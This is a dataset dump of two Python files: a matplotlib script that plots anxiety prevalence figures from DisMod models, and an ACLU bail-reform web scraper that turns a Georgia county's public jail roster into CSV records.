Dataset schema (column: type, observed range):
blob_id: string, length 40
directory_id: string, length 40
path: string, length 3 to 281
content_id: string, length 40
detected_licenses: list, length 0 to 57
license_type: string, 2 classes
repo_name: string, length 6 to 116
snapshot_id: string, length 40
revision_id: string, length 40
branch_name: string, 313 classes
visit_date: timestamp[us]
revision_date: timestamp[us]
committer_date: timestamp[us]
github_id: int64, 18.2k to 668M (nullable)
star_events_count: int64, 0 to 102k
fork_events_count: int64, 0 to 38.2k
gha_license_id: string, 17 classes
gha_event_created_at: timestamp[us]
gha_created_at: timestamp[us]
gha_language: string, 107 classes
src_encoding: string, 20 classes
language: string, 1 class
is_vendor: bool, 2 classes
is_generated: bool, 2 classes
length_bytes: int64, 4 to 6.02M
extension: string, 78 classes
content: string, length 2 to 6.02M
authors: list, length 1
author: string, length 0 to 175
Row 1
blob_id: 8dd5a412c4409ce9d481424ca81b2ca41f5143de
directory_id: 66b756b777c9ed2f09c35e5d6a2d2b255f6c5c6f
path: /book/graphics_anxiety.py
content_id: 861e29fcb312cdd6aeb5abd2db8adb2ec890ae53
detected_licenses: [] | license_type: no_license | repo_name: al00014/gbd
snapshot_id: 942d826febe935b9d47a417ca6ca089c6cf0cc56
revision_id: 8c69a154d01c752d16e65cab983d635d4851c7c3
branch_name: refs/heads/master | visit_date: 2021-01-11T06:53:01.899892 | revision_date: 2020-05-26T13:15:36 | committer_date: 2020-05-26T13:15:36
github_id: 71,981,670 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: 2016-10-26T08:19:48 | gha_created_at: 2016-10-26T08:19:48 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 3,537 | extension: py
content:
import sys
sys.path += ['../gbd', '../gbd/book', '../dm3-computation_only/', '../dm3-computation_only/book']
import pylab as pl
import pymc as mc
import pandas
import dismod3
reload(dismod3)
import book_graphics
reload(book_graphics)
import matplotlib as mpl
# set font
book_graphics.set_font()
def my_axis(ymax):
pl.axis([-5,105,-ymax/10.,ymax])
def my_plot_data_bars(df, color, label, style='book'):
""" Plot some data bars
Input
-----
df : pandas.DataFrame with columns age_start, age_end, value
"""
data_bars = zip(df['age_start'], df['age_end'], df['value'])
# show at most 500 bars, to keep things fast
# TODO: make 500 into an option
if len(data_bars) > 500:
import random
data_bars = random.sample(data_bars, 500)
# make lists of x and y points, faster than plotting each bar
# individually (the pl.nan entries break the plotted line into separate segments)
x = []
y = []
for a_0i, a_1i, p_i in data_bars:
x += [a_0i, a_1i, pl.nan]
y += [p_i, p_i, pl.nan]
pl.plot(x, y, 's-', mew=1, mec='w', ms=4, color=color, label=label)
def load_new_model():
try:
model = dismod3.data.load('/home/j/Project/dismod/output/dm-34944')
except:
model = dismod3.data.load('/home/j/Project/dismod/dismod_status/prod/dm-34944')
model.keep(areas=['australasia'], sexes=['female'], start_year=2000)
# seems to be some trouble with missing values in the mx covariates
model.input_data = model.input_data.drop(['x_mx_conflict_bin', 'x_mx_shock_10_years_bin'], axis=1)
model.parameters['p']['fixed_effects']['x_sex'] = dict(dist='Constant', mu=0)
model.parameters['p']['fixed_effects']['x_cv_below7disorders'] = dict(dist='Constant', mu=0)
return model
best_model = load_new_model()
pm_model = load_new_model()
pm_model.input_data = pm_model.input_data[pm_model.input_data['x_cv_past_year'] == 0]
# figure anxiety-data_by_cv
pl.figure(**book_graphics.half_page_params)
df = best_model.get_data('p')
pl.figure(**book_graphics.half_page_params)
for i in range(2):
pl.subplot(1,2,1+i)
dismod3.graphics.plot_data_bars(df[df['x_cv_past_year'] == i])
pl.xlabel('Age (years)')
pl.ylabel('Prevalence (%)')
pl.yticks([0, .07, .14, .21, .28], [0, 7, 14, 21, 28])
my_axis(.30)
if i == 0: book_graphics.subtitle('(a)')
if i == 1: book_graphics.subtitle('(b)')
pl.subplots_adjust(wspace=.35, top=.99, bottom=.14)
pl.savefig('book/graphics/anxiety-data_by_cv.pdf')
pl.savefig('book/graphics/anxiety-data_by_cv.png')
# figure anxiety-FE
data = pandas.read_csv('/home/j/Project/dismod/gbd/data/applications-data_anxiety.csv')
pl.figure(**book_graphics.full_page_params)
my_plot_data_bars(best_model.get_data('p'), color='grey', label='Period prevalence')
my_plot_data_bars(pm_model.get_data('p'), color='black',label='Point prevalence')
pl.plot(pl.arange(101), pl.array(data['best']), 'k-', linewidth=2, label='All data, with fixed effects')
pl.plot(pl.arange(101), pl.array(data['no_FE']), 'k--', linewidth=2, label='All data, without fixed effects')
pl.plot(pl.arange(101), pl.array(data['pt_p']), 'k:', linewidth=2, label='Point prevalence')
pl.xlabel('Age (years)')
pl.ylabel('Prevalence (%)')
pl.yticks([0, .07, .14, .21, .28], [0, 7, 14, 21, 28])
my_axis(.30)
pl.legend(loc='upper right', fancybox=True, shadow=True)
pl.savefig('book/graphics/anxiety-FE.pdf')
pl.savefig('book/graphics/anxiety-FE.png')
pl.show()
authors: ["[email protected]"] | author: ""

Row 2
blob_id: 327775f554307166eebd19b680c8f7b182103d28
directory_id: dedf6e9dea2d6a30dda669c954eb2cc059553768
path: /src/webscraper/henry/scraper_henry.py
content_id: 769860fe05e287b6053d2fb1480735edaeaf5468
detected_licenses: ["MIT"] | license_type: permissive | repo_name: rimjieun/aclu-bail-reform
snapshot_id: a5b6fc71b30e053c08f6c3e0571346655c98cd30
revision_id: 87ac06375a52afdbe79e8ce04542d43498ee4d51
branch_name: refs/heads/master | visit_date: 2021-08-30T17:36:25.701705 | revision_date: 2017-12-18T20:57:01 | committer_date: 2017-12-18T20:57:01
github_id: 106,773,872 | star_events_count: 0 | fork_events_count: 0
gha_license_id: MIT | gha_event_created_at: 2017-12-18T18:52:31 | gha_created_at: 2017-10-13T03:31:26 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 32,773 | extension: py
content:
import requests
import numpy as np
import pandas as pd
import time
from warnings import warn
from bs4 import BeautifulSoup
from datetime import datetime
class ScraperHenry(object):
"""Webscraper for Henry county jail, GA
TODO: Update this from copied Athens-Clarke
This county has 2 main sites to scrape: their current inmate roster
and their arrests from the last 7 days (booking report).
They offer similar information, but the booking report also shows released
inmates, whether they posted bail / time served / recognizance / etc.,
court jurisdiction and warrant #s. Best to make 2 CSV files so we can
use the two info sources in different ways.
"""
def __init__(self, timeout=10, retries=0, sleep_sec=5):
self.url_roster = "http://www.henrycountysheriff.net/InmateInformation" # entry URL from which to start scraping current inmate roster
self.timeout = timeout # seconds timeout to avoid infinite waiting
self.retries = retries # how many times to retry loading if there's http errors.
self.sleep_sec = sleep_sec # seconds to wait between subpage requests to avoid overloading server
response = requests.head(url=self.url_roster) # set user-agent so they can contact us if they don't like how we're scraping
self.headers = {'User-Agent' : response.request.headers['User-Agent'] + ' (Contact [email protected], https://github.com/lahoffm/aclu-bail-reform)'}
self.csv_dir = '../../../data' # where to write data
self.df = [] # will be a dataframe later. self.df is created for inmate roster, dumped to file, recreated for booking report, dumped to file
def scrape_all(self):
""" Scrape main page then each inmate's subpage with more details.
Assemble results into pandas dataframe in standard format and dump to CSV file."""
html_main = self.scrape_main_roster() # current inmate roster
self.scrape_sub(html_main, 'roster')
self.dump('current-inmate-roster')
def scrape_main_roster(self):
"""Get main inmate roster table into data frame formatted for the output CSV"""
# Get main page table into data frame
html_main, errormsg = self.get_page(self.url_roster) # will be used to get subpage links
if errormsg is not None:
raise requests.RequestException('Could not get main jail page. Error message: ' + errormsg)
df_list = pd.read_html(html_main, header=0, converters={'MID#': str,
'NAME': str,
'SEX': str,
'RACE': str,
'BOOKING DATE': str,
'CHARGE': str,
'BOND AMOUNT': str,
'CASE NUMBER': str,
'POLICE CASE#': str,
'YEAR OF BIRTH': str,
'VISITATION': str})
assert len(df_list) == 1, 'Should be only 1 table on page'
df_main = df_list[0]
df_main = df_main.iloc[1:,:] # drop 1st row, it's all NaN because site had an extra TR tag.
df_main.reset_index(drop=True, inplace=True) # so indexes equal to self.df indexes
assert all(df_main.columns==['MID#', 'NAME', 'SEX', 'RACE', 'BOOKING DATE', 'CHARGE', 'BOND AMOUNT', 'CASE NUMBER', 'POLICE CASE#', 'YEAR OF BIRTH', 'VISITATION']), 'Column names have changed'
self.init_df(df_main.shape[0]) # init self.df
# Set URL - will be overwritten with subpage's url unless we get HTTP errors
self.df['url'] = self.url_roster
# Set inmate ID
assert all(pd.notnull(df_main['MID#']))
assert df_main['MID#'].nunique() == df_main.shape[0], 'Non-unique inmate IDs' # check inmate IDs are unique so matching works in scrape_sub
self.df['inmate_id'] = df_main['MID#']
# Set inmate last/first/middle name.
self.set_inmate_name(df_main)
# Set inmate sex
self.set_inmate_sex(df_main)
# Set inmate race
self.set_inmate_race(df_main)
# Set booking timestamp
self.set_booking_timestamp(df_main, 'BOOKING DATE')
# Not setting charges or bond_amount from main page, because more detailed info found in subpages
# Set case number - many are blank for Athens-Clarke county
# Replace semicolons so ETL code doesn't think they are multiple processing numbers
# Format is 'Case # XXX;Police case # XXX'. If one or both are missing there is still a ';'
# so ETL parser knows what's missing.
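# Illustrative example (values are made up): CASE NUMBER '2017-01' and POLICE CASE# 'PC-9'
# end up as 'Case # 2017-01;Police case # PC-9' after the concatenation below.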
self.df['processing_numbers'] = 'Case # ' + df_main['CASE NUMBER'].str.replace(';',':')
self.df['processing_numbers'].fillna('', inplace=True)
tmp = ';Police case # ' + df_main['POLICE CASE#'].str.replace(';',':')
tmp.fillna(';', inplace=True)
self.df['processing_numbers'] = self.df['processing_numbers'].str.cat(tmp)
# Set inmate date of birth - only the year is available for Athens-Clarke county
self.set_inmate_dob(df_main)
# Set inmate age when we scraped the site
self.set_inmate_age(df_main)
return html_main
def scrape_main_booking(self):
""" Get main inmate booking table into data frame formatted for the output CSV.
NB in contrast to scrape_main_roster, we have to do some split/apply/combine
at the end, because inmates have one row per charge on the main page.
What we want is to get one row per inmate. """
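# Sketch of the split/apply/combine done at the end of this method:
#   inmate_groups = self.df.groupby('inmate_id', sort=False, as_index=False)
#   self.df = inmate_groups.apply(self.compress_inmate_rows)
# i.e. the per-charge rows of each inmate collapse into one row whose multi-valued
# fields (charges, severity, bond_amount, ...) are ';'-joined by compress_inmate_rows().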
# Get main page table into data frame
html_main, errormsg = self.get_page(self.url_booking) # will be used to get subpage links
if errormsg is not None:
raise requests.RequestException('Could not get main jail page. Error message: ' + errormsg)
df_list = pd.read_html(html_main, header=0, converters={'MID#': str,
'BOOKING TIME': str,
'NAME': str,
'YEAR OF BIRTH': str,
'RACE': str,
'SEX': str,
'ARRESTING AGENCY': str,
'RELEASE TIME': str,
'CHARGE': str,
'CRIME TYPE': str,
'COURT JURISDICTION': str,
'BONDING COMPANY': str,
'BOND AMOUNT': str,
'WARRANT #': str,
'POLICE CASE#': str})
assert len(df_list) == 1, 'Should be only 1 table on page'
df_main = df_list[0] # Unlike for roster, don't have to drop 1st row
assert all(df_main.columns==['MID#', 'BOOKING TIME', 'NAME', 'YEAR OF BIRTH', 'RACE', 'SEX', 'ARRESTING AGENCY', 'RELEASE TIME', 'CHARGE', 'CRIME TYPE', 'COURT JURISDICTION', 'BONDING COMPANY', 'BOND AMOUNT', 'WARRANT #', 'POLICE CASE#']), 'Column names have changed'
self.init_df(df_main.shape[0]) # init self.df - final nrows will be smaller because of split/apply/combine later
# Set URL - will be overwritten with subpage's url unless we get HTTP errors
self.df['url'] = self.url_booking
# Set inmate ID --> the main booking page MID# differs from inmate detail page MID#, so this will be overwritten
# when scraping subpages. Will ultimately save subpage MID# because this is consistent with how "current roster"
# page does it. We need the main page MID# in this function to do split/apply/combine by inmate.
assert all(pd.notnull(df_main['MID#'])) # Unlike for roster, not checking inmate IDs are unique
self.df['inmate_id'] = df_main['MID#']
# Set booking timestamp
self.set_booking_timestamp(df_main, 'BOOKING TIME')
# Set inmate last/first/middle name.
self.set_inmate_name(df_main)
# Set inmate date of birth - only the year is available for Athens-Clarke county
self.set_inmate_dob(df_main)
# Set inmate race
self.set_inmate_race(df_main)
# Set inmate sex
self.set_inmate_sex(df_main)
# Set arresting agency
assert all(pd.notnull(df_main['ARRESTING AGENCY']))
self.df['agency'] = df_main['ARRESTING AGENCY']
# Set release timestamp - county has different format than booking times
# See set_booking_timestamp() for more comments
df_main['RELEASE TIME'].fillna('', inplace=True)
convert_dt = lambda dt : '' if dt=='' else (str(datetime.strptime(dt, "%m/%d/%Y %I:%M%p")) + ' EST') # Format changes will likely be caught here
self.df['release_timestamp'] = df_main["RELEASE TIME"].apply(convert_dt)
# Set charge - at present, there's 1 row per charge but will split/apply/combine later so it's 1 row per inmate
df_main['CHARGE'].fillna('', inplace=True) # this happens sometimes, probably as they are in process of updating a person's charge
self.df['charges'] = df_main['CHARGE'].str.replace(';',':') # convert so we can later chain charges with ';'
# Set charge severity - ignoring "Local ordinance" because it's rare
df_main.fillna('', inplace=True) # all columns from this point forward probably have NaN so fill with ''
df_main['CRIME TYPE'] = df_main['CRIME TYPE'].str.lower().str.replace('local ordinance','')
assert np.isin(df_main['CRIME TYPE'].unique(), np.array(['misdemeanor','felony',''])).all(), 'Invalid misdemeanor/felony format.'
self.df['severity'] = df_main['CRIME TYPE']
# Set court jurisdiction in 'other' field
self.df['other'] = pd.Series(['Court jurisdiction: ']*df_main.shape[0]).str.cat(df_main['COURT JURISDICTION'].str.replace(';',':'))
self.df.loc[self.df['other']=='Court jurisdiction: ','other'] = ''
# Set bond_amount - will add to this when scraping subpages
self.format_bond_amount(df_main)
df_main['BONDING COMPANY'] = df_main['BONDING COMPANY'].str.replace(';',':')
self.df['bond_amount'] = df_main['BOND AMOUNT'].str.cat([["( Bonding company:"]*df_main.shape[0],\
df_main['BONDING COMPANY'],\
[')']*df_main.shape[0]],\
sep=' ')
# Set case number & warrant number - see comments in scrape_main_roster()
self.df['processing_numbers'] = 'Warrant # ' + df_main['WARRANT #'].str.replace(';',':')
self.df.loc[self.df['processing_numbers']=='Warrant # ','processing_numbers'] = ''
tmp = ',Police case # ' + df_main['POLICE CASE#'].str.replace(';',':')
tmp[tmp==',Police case # '] = ',' # split with ',' instead of ';' because each charge has its own warrant/case#
self.df['processing_numbers'] = self.df['processing_numbers'].str.cat(tmp)
# Set inmate age when we scraped the site
self.set_inmate_age(df_main)
# Split/apply/combine
# On the main booking site they post multiple rows per inmate, one row per charge.
# This code compresses it into one row per inmate, as required for the csv specification
inmate_groups = self.df.groupby('inmate_id', sort=False, as_index=False) # each group = 1 inmate
self.df = inmate_groups.apply(self.compress_inmate_rows) # now each inmate (technically, each inmate_id) has one row with 1+ charges, etc.
self.df.reset_index(drop=True, inplace=True) # apply() returns it with multiindex we don't need
return html_main
def scrape_sub(self, html_main, flag):
""" Scrape each inmate's details page - links from main page.
Add data to the inmate's row in self.df.
Retry self.retries times if there's any errors, then skip to next
subpage. If subpage couldn't be loaded, log it in the "notes" field.
flag: 'roster' or 'booking' to scrape differently based on what is on main page
"""
soup = BeautifulSoup(html_main, 'lxml')
nlinks = len(list(soup.find_all('a', href=True)))
if flag=='roster':
assert nlinks == self.df.shape[0], "Number of hrefs != number of table entries"
else:
self.df['inmate_id'] = '' # The booking page MID# differs from inmate detail MID#. We will use the subpage MID# for consistency with "current roster" page
self.df['notes'] = 'Failed to load inmate detail page. Leaving some fields blank' # will be erased ONLY when page successfully loads
i = 0
for a in soup.find_all('a', href=True): # scrape each subpage (which have additional details for a single inmate)
# Get subpage
# The tag's format should be
# <a href="##" onclick="window.open('detailsNEW.asp?id=-59091&bid=2017-00004550&pg=1&curr=yes',
# 'search', 'width=730,height=800,status=yes,resizable=yes,scrollbars=yes')">ABOYADE, OLUFEMI BABALOLA</a>
i = i + 1
print('Downloading subpage {0} of {1}...'.format(i, nlinks))
url_main = self.url_roster if flag=='roster' else self.url_booking
subpage_url = url_main[0:url_main.rfind('/')+1] + a["onclick"].split(',')[0].split("'")[1]
if any(self.df['url'].isin([subpage_url])): # already visited link - happens for booking site
continue
html_sub, errormsg = self.get_page(subpage_url)
if errormsg is not None:
warn('Could not get URL "' + subpage_url + '" for subpage ' + str(i) + '. Error message: ' + errormsg + '. Continuing to next page')
continue
# Get subpage's 2 tables in dataframes
try:
df_list = pd.read_html(html_sub, match="Name:", converters={0: str, 1: str, 2: str, 3: str})
except ValueError as e:
warn(str(e) +' for subpage ' + str(i) + ', continuing to next page.')
continue
assert len(df_list) == 1, "Should be only 1 table on page with matching text."
df_sub1 = df_list[0]
assert df_sub1.shape==(5,4), 'Wrong table dimensions'
if pd.isnull(df_sub1.loc[1,1]): df_sub1.loc[1,1]='' # for blank addresses
if pd.isnull(df_sub1.loc[2,3]): df_sub1.loc[2,3]='' # for blank races
assert df_sub1.iloc[0,0]=='Name:' and df_sub1.iloc[1,0]=='Address:' and df_sub1.iloc[2,0]=='Sex:'\
and df_sub1.iloc[3,0]=='Year of Birth:' and df_sub1.iloc[4,0]=='Booking Date/Time:' and pd.notnull(df_sub1.iloc[:,1]).all()\
and df_sub1.iloc[0,2].startswith('MID#: ') and pd.isnull(df_sub1.iloc[1,2]) and df_sub1.iloc[2,2]=='Race:'\
and df_sub1.iloc[3,2]=='Height/Weight:' and df_sub1.iloc[4,2]=='Released Date/Time:' and pd.isnull(df_sub1.iloc[0,3])\
and pd.isnull(df_sub1.iloc[1,3]) and pd.notnull(df_sub1.iloc[2:5,3]).all(), 'Table format has changed'
df_list = pd.read_html(html_sub, header=0, match="ARRESTING AGENCY", converters={0: str, 1: str, 2: str, 3: str, 4: str, 5: str, 6: str})
assert len(df_list) == 1, "Should be only 1 table on page with matching text."
df_sub2 = df_list[0]
assert all(df_sub2.columns==['ARRESTING AGENCY', 'GRADE OF CHARGE', 'CHARGE DESCRIPTION', 'BOND AMOUNT', 'BOND REMARKS', 'BOND LAST UPDATED', 'DISPOSITION']), 'Column names have changed'
assert not df_sub2.empty, 'Table has zero rows'
# Find matching self.df row where we will insert data
inmate_id = df_sub1.iloc[0,2][6:] # checked above that it starts with 'MID#: '
if flag=='roster': # Use inmate id to match
ix = self.df.index[self.df['inmate_id']==inmate_id] # scrape_main_roster checked that inmate IDs are all unique, so this will match 1 row
assert not self.df.loc[ix].empty, 'Inmate id "' + inmate_id + '" not found in main page'
else: # The booking page MID# differs from inmate detail MID#, so we have to match inmates other way
inmate_name = df_sub1.iloc[0,1]
booking_timestamp = self.convert_dt(df_sub1.iloc[4,1])
inmate_names = self.df['inmate_lastname'].str.cat([[', ']*self.df.shape[0], \
self.df['inmate_firstname'], [' ']*self.df.shape[0], self.df['inmate_middlename']]).str.rstrip()
tmp = pd.DataFrame({'inmate_name':inmate_names,'booking_timestamp':self.df['booking_timestamp']})
ix = tmp.index[(tmp['inmate_name']==inmate_name) & (tmp['booking_timestamp']==booking_timestamp)]
assert len(ix) == 1, 'Should be exactly one matching inmate in main page'
# Set inmate ID
if flag=='booking': # roster site has same inmate id on main page & subpage.
# booking site's inmate ids differ on main page & subpages but to be consistent
# with roster site, set it to subpage's inmate id.
self.df.loc[ix,'inmate_id'] = inmate_id
# Set URL
self.df.loc[ix,'url'] = subpage_url
# Set inmate address
self.df.loc[ix, 'inmate_address'] = df_sub1.iloc[1,1]
# Set agency
if flag=='roster': # booking site had this in main page
assert all(pd.notnull(df_sub2['ARRESTING AGENCY'])), 'Invalid arresting agency format'
try:
assert df_sub2['ARRESTING AGENCY'].nunique()==1, 'Invalid arresting agency format'
except AssertionError as e:
warn(str(e) + ", multiple arresting agencies for subpage " + str(i) + ". Inserting the agency that made the arrest for each charge")
df_sub2.loc[0, 'ARRESTING AGENCY'] = df_sub2['ARRESTING AGENCY'].str.cat(sep=';')
self.df.loc[ix, 'agency'] = df_sub2.loc[0, 'ARRESTING AGENCY']
df_sub2.fillna('', inplace=True) # important for later fields so semicolons go in right places
# Set charge severity.
# Sometimes one "grade of charge" is NaN, means they are holding the inmate for some other county.
# We still put in the same fields, but the "grade of charge" will be an empty string.
if flag=='roster': # booking site had this in main page
if any(df_sub2['GRADE OF CHARGE'] == 'L'): # 'L' means 'Local ordinance' but this is rare so ignoring it
df_sub2['GRADE OF CHARGE'] = df_sub2['GRADE OF CHARGE'].str.replace('L','')
warn("Grade of charge 'L' (local ordinance) for subpage " + str(i) + ". Replacing with ''")
assert np.isin(df_sub2['GRADE OF CHARGE'].unique(), np.array(['M','F',''])).all(), 'Invalid misdemeanor/felony format.'
df_sub2['GRADE OF CHARGE'] = df_sub2['GRADE OF CHARGE'].str.replace('M','misdemeanor').str.replace('F','felony')
self.df.loc[ix, 'severity'] = df_sub2['GRADE OF CHARGE'].str.cat(sep=';')
# Set charges, separated by ';' even if charge description is empty string
# Have to replace ';' with ':' first to prevent bug
if flag=='roster': # booking site had this in main page
self.df.loc[ix,'charges'] = df_sub2['CHARGE DESCRIPTION'].str.replace(';',':').str.cat(sep=';')
# Set bond amount for each charge, separated by ';'.
if flag=='roster': # booking site had this in main page
self.format_bond_amount(df_sub2)
df_sub2['BOND REMARKS'] = df_sub2['BOND REMARKS'].str.replace(';',':')
df_sub2['BOND LAST UPDATED'] = df_sub2['BOND LAST UPDATED'].str.replace(';',':')
self.df.loc[ix,'bond_amount'] = df_sub2['BOND AMOUNT'].str.cat([df_sub2['BOND REMARKS'],
[' Bond last updated']*df_sub2.shape[0],
df_sub2['BOND LAST UPDATED']],
sep=' ').str.cat(sep=';')
# The reason this is not in bond_amount field
# is because sometimes we can't match up charges 1-1 with the charge on the main page.
# For example, sometimes several charges in main page turn into one charge in subpage.
# Note main page already gives bond amount and whether they posted bond.
if flag=='booking':
supp_str = pd.Series(['Supplemental bond info for charge ']*df_sub2.shape[0]).str.cat(
[df_sub2['CHARGE DESCRIPTION'],
[': bond remarks ']*df_sub2.shape[0],
df_sub2['BOND REMARKS'],
[', bond last updated ']*df_sub2.shape[0],
df_sub2['BOND LAST UPDATED']]).str.cat(sep=';')
self.df.loc[ix,'other'] = self.df.loc[ix,'other'].str.cat([supp_str], sep=' ||| ')
# Set status for each charge like 'SENTENCED'. For this site, most statuses are blank.
if flag=='roster': # nb see comment above for why we don't do this for flag==booking
self.df.loc[ix, 'current_status'] = df_sub2['DISPOSITION'].str.replace(';',':').str.cat(sep=';')
# Set notes
self.df.loc[ix,'notes'] = ''
time.sleep(self.sleep_sec)
def init_df(self, nrows):
""" This will go in CSV file. """
self.df = pd.DataFrame(np.zeros((nrows, 25)), columns=[
'county_name', # yes
'timestamp', # yes - time main page was scraped
'url', # yes - subpage urls (if couldn't connect, it's the main page url)
'inmate_id', # yes
'inmate_lastname', # yes
'inmate_firstname', # yes
'inmate_middlename', # yes
'inmate_sex', # yes
'inmate_race', # yes
'inmate_age', # yes - the age they turn on their birthdays in current year
'inmate_dob', # yes - only the year
'inmate_address', # yes - in subpages
'booking_timestamp', # yes
'release_timestamp', # yes - only for booking reports site, not for current roster site
'processing_numbers', # yes
'agency', # yes - in main page or subpages
'facility', # yes
'charges', # yes - in subpages
'severity', # yes - in subpages
'bond_amount', # yes - in main page or subpages
'current_status', # yes - in subpages
'court_dates',
'days_jailed',
'other', # yes for booking reports site - court jurisdiction
'notes']) # yes
self.df[:] = '' # unfilled columns will be written to CSV as empty strings
self.df['county_name'] = 'athens-clarke'
self.df['facility'] = 'Clarke County Jail' # only one jail in this county, apparently
self.df['timestamp'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S EST') # hardcoded EST because it's not critical to get the hour correct,
# timestamps are just for knowing roughly when we scraped.
def format_bond_amount(self, dataframe):
""" Formats a dollar string in dataframe column
If bond amount is '$0.00', '$' or '' there will be no dollar amount starting the bond_amount field,
just ' ' then the bond remarks / bond last updated. """
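# Illustrative example (values are made up): '$1,000.00' -> '$1000.00', while '$0.00' and '$' both -> ''.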
dataframe.loc[dataframe['BOND AMOUNT']=='$0.00','BOND AMOUNT'] = '' # Usually indicates no bond, not "released without bond"
dataframe.loc[dataframe['BOND AMOUNT']=='$', 'BOND AMOUNT'] = '' # Sometimes this happens, not sure what it means
dataframe['BOND AMOUNT'] = dataframe['BOND AMOUNT'].str.replace(',','') # Replace $1,000.00 with $1000.00
def set_inmate_name(self, df_main):
""" Set inmate last/first/middlename. Assumes format is "lastname, firstname zero or more middle names" """
assert all(pd.notnull(df_main['NAME']))
inmate_name = df_main['NAME'].str.split(', ', n=1, expand=True)
assert inmate_name.shape[1] == 2, 'Invalid name format'
self.df['inmate_lastname'] = inmate_name.iloc[:,0]
inmate_name = inmate_name.iloc[:,1]
inmate_name = inmate_name.str.split(' ', n=1, expand=True)
assert inmate_name.shape[1] == 2, 'Invalid name format'
inmate_name.fillna('', inplace=True)
self.df['inmate_firstname'] = inmate_name.iloc[:,0]
self.df['inmate_middlename'] = inmate_name.iloc[:,1]
def set_inmate_sex(self, df_main):
assert all(pd.notnull(df_main['SEX']))
assert np.isin(df_main['SEX'].str.lower().unique(), np.array(['male','female'])).all(), "Invalid sex format"
self.df['inmate_sex'] = df_main['SEX'].str.lower().str[0]
def set_inmate_race(self, df_main):
if any(pd.isnull(df_main['RACE'])):
warn("At least one inmate's race was blank.")
df_main['RACE'].fillna('', inplace=True)
inmate_race = df_main['RACE'].str.lower() # don't have to convert 'asian' or 'white' because already listed that way
inmate_race = inmate_race.str.replace('black/african american', 'black')\
.str.replace('hispanic or latino', 'hispanic')\
.str.replace('middle eastern decent', 'middle-eastern') # they had a typo
assert np.isin(inmate_race.unique(), np.array(['asian','white','black','hispanic','middle-eastern',''])).all(),\
"One or more of these races not converted to standard format: " + str(inmate_race.unique())
self.df['inmate_race'] = inmate_race
def set_inmate_age(self, df_main):
""" Set inmate age when we scraped the site.
Because we only have birth year, age is whatever age they turn on their birthdays in the current year.
That means it's impossible for 18 year olds (minimum booking age) to be incorrectly assigned age 17. """
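# Illustrative example (values are made up): scraping in 2018 with YEAR OF BIRTH '1990' gives inmate_age '28'.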
calc_age = lambda yyyy : str(datetime.now().year - int(yyyy))
self.df['inmate_age'] = df_main['YEAR OF BIRTH'].apply(calc_age)
def set_inmate_dob(self, df_main):
""" Set inmate date of birth - only the year is available for Athens-Clarke county """
assert all(pd.notnull(df_main['YEAR OF BIRTH']))
assert all(df_main['YEAR OF BIRTH'].str.len()==4), 'Invalid year of birth format'
self.df['inmate_dob'] = df_main['YEAR OF BIRTH']
def set_booking_timestamp(self, df_main, booking_colname):
""" Set booking timestamp from appropriate column.
Hardcoding 'EST' because Athens-Clarke county is in Georgia USA
See https://docs.python.org/3/library/datetime.html#strftime-strptime-behavior
Outputs 'YYYY-MM-DD HH:MM:SS EST', see https://docs.python.org/3/library/datetime.html#datetime.datetime.__str__ """
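# Illustrative example (value is made up): '12/25/2017 10:30:45 PM' -> '2017-12-25 22:30:45 EST' via convert_dt().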
assert all(pd.notnull(df_main[booking_colname]))
self.df['booking_timestamp'] = df_main[booking_colname].apply(self.convert_dt)
def convert_dt(self, dt):
return str(datetime.strptime(dt, "%m/%d/%Y %I:%M:%S %p")) + ' EST' # Format changes will likely be caught here
def compress_inmate_rows(self, df_inmate):
""" Used with pandas groupby & apply methods.
df_inmate = self.df with only the rows for a single inmate.
This compresses them into a single row and returns the row"""
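# Illustrative example (values are made up): two rows for one inmate with charges 'THEFT' and
# 'BATTERY' come back as a single row whose 'charges' field is 'THEFT;BATTERY'.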
# Before compressing, check that rows are identical where they SHOULD be identical.
# For example, the inmate's last name should be identical for each row in this group
# (only checking rows obtained from main page data)
errmsg = '>1 unique values in group column'
assert df_inmate['inmate_lastname'].nunique()==1, errmsg
assert df_inmate['inmate_firstname'].nunique()==1, errmsg
assert df_inmate['inmate_middlename'].nunique()==1, errmsg
assert df_inmate['inmate_sex'].nunique()==1, errmsg
assert df_inmate['inmate_race'].nunique()==1, errmsg
assert df_inmate['inmate_age'].nunique()==1, errmsg
assert df_inmate['inmate_dob'].nunique()==1, errmsg
assert df_inmate['booking_timestamp'].nunique()==1, errmsg
# Copy it to avoid possible side effects
# See https://pandas.pydata.org/pandas-docs/stable/generated/pandas.core.groupby.GroupBy.apply.html
df_onerow = df_inmate.iloc[0,:].copy().to_frame().transpose()
# Set the fields that are allowed to have different entries (one entry per charge), separated by ';'
# Previous processing already replaced ';' in fields with ':'
df_onerow['release_timestamp'] = df_inmate['release_timestamp'].str.cat(sep=';')
df_onerow['processing_numbers'] = df_inmate['processing_numbers'].str.cat(sep=';')
if df_inmate['agency'].nunique()>1:
warn("Multiple arresting agencies for inmate ID " + df_onerow.loc[df_onerow.index[0],'inmate_id'] + ". Inserting the agency that made the arrest for each charge")
df_onerow['agency'] = df_inmate['agency'].str.cat(sep=';') # SHOULD be indented under if statement
df_onerow['charges'] = df_inmate['charges'].str.cat(sep=';')
df_onerow['severity'] = df_inmate['severity'].str.cat(sep=';')
df_onerow['bond_amount'] = df_inmate['bond_amount'].str.cat(sep=';')
df_onerow['other'] = df_inmate['other'].str.cat(sep=';')
return df_onerow
def dump(self, fid):
""" dump to CSV """
csv_fname = datetime.now().strftime('athens-clarke_' + fid + '_%Y_%m_%d_%H_%M_%S.csv')
self.df.to_csv(self.csv_dir + '/' + csv_fname, index=False, line_terminator='\n') # matches default params for csv.writer
print('Wrote ' + csv_fname + ' to ' + self.csv_dir)
def get_page(self, url):
""" Get html for a single page. If errors, retries loading page self.retries times.
Returns html text (None if errors)
and error message (None if no errors)"""
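# Callers unpack the pair, e.g. (see scrape_main_roster above):
#   html, errormsg = self.get_page(url)
#   if errormsg is not None: ...skip this page or raise...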
retries_left = self.retries
while retries_left >= 0:
try:
response = requests.get(url, timeout=self.timeout, headers=self.headers)
if response.status_code != requests.codes.ok:
raise requests.HTTPError('HTTP response code was {0}, should have been {1}'.format(response.status_code, requests.codes.ok))
return response.text, None # no errors
except Exception as e:
errormsg = str(e)
retries_left = retries_left - 1
return None, errormsg # errors on the last attempt
